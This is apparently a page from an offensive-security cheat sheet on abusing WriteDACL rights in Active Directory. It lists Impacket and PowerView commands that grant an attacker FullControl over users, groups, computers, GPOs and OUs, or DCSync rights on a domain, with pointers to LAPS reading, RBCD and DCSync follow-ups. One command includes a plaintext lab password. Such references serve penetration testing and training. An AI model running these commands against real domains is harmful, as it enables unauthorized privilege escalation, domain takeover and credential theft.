WriteDACL

Information

With Write access to the target object’s DACL, you can grant yourself any privilege you want on the object.

Grant yourself FullControl of the user:

# Assigning FullControl permissions over the user with Impacket
impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

# Assigning GenericAll permissions over the user with PowerView
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All

See here for exploitation options.

Grant yourself FullControl of the group:

# Powerview
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers

This can be leverage to add members to the group (see here).

Grant yourself FullControl of the computer:

# Assigning GenericAll permissions over the computer
Add-DomainObjectAcl -TargetIdentity windows01 -Rights All

This can be leveraged to read the LAPS password or perform RBCD against the target host.

Grant yourself DCSync rights:

Add-DomainObjectAcl -TargetIdentity testlab.local -Rights DCSync

This can be leveraged to perform a DCSync attack.

Grant yourself FullControl of the GPO:

Add-DomainObjectAcl -TargetIdentity TestGPO -Rights All

This can be leveraged to edit the GPO and take over an object the GPO applies to.

Grant yourself FullControl of the OU:

Add-DomainObjectAcl -TargetIdentity <OU-GUID> -Rights All

This can be leveraged to add a new ACE to the OU that inherits down to child objects so we can then take over those child objects.

PreviousWriteOwner NextAttacks

Last updated 1 month ago

Was this helpful?